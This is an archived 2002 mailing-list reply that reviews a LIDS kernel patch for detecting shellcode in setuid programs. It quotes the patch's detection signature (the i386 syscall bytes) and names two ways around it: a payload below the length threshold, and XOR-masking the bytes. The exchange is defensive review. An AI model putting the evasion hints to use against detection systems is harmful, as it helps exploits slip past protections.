Re: shellcode detection and prevention in LIDS

From: Valdis.Kletnieksat_private
Date: Thu May 23 2002 - 20:45:27 PDT

  • Next message: Bosko Radivojevic: "Re: [lids-user] shellcode detection and prevention in LIDS"

    On Thu, 23 May 2002 16:20:58 PDT, Huagang Xie said:
    
    > When the parameter/env length is too long, it will print out a message to
    > warn you, and if found shellcode at the same time, it will stop the
    > program. This checking only apply to the setuid/setgid program. It is very
    > simple way to check the shellcode, it only check the system call assemble
    > code, for example, for I386, it is "\xcd\x80". Now we can support only
    > I386, MIPS, SPARC and PPC. During the test, it have succefully detect and
    > prevent some of the local buffer overflow attack. like su, xlock..Here is
    > some log exmple show on my machine,
    
    First off, let me say this patch (which I have NOT tried) looks like a
    Very Good Thing overall.  However, I see 2 weaknesses offhand:
    
    1) It does not help if the shellcode sled is smaller than your
    SHELLCODE_LENGTH variable (which could easily be the case, for instance,
    if the exploit attacks a 64-byte long buffer - see the xntpd exploit,
    which was an off-by-one on a 128-byte buffer, if I remember right).
    
    2) If the shellcode does an XOR-trick to mask the \xc\x80, similar to
    the usual techniques for embedding nulls, your code won't stop that either.
    
    But as long as you realize it has limits, it looks good....
    
    -- 
    				Valdis Kletnieks
    				Computer Systems Senior Engineer
    				Virginia Tech
    
    
    
    

    _______________________________________________ linux-security-module mailing list linux-security-moduleat_private http://mail.wirex.com/mailman/listinfo/linux-security-module



    This archive was generated by hypermail 2b30 : Thu May 23 2002 - 20:47:00 PDT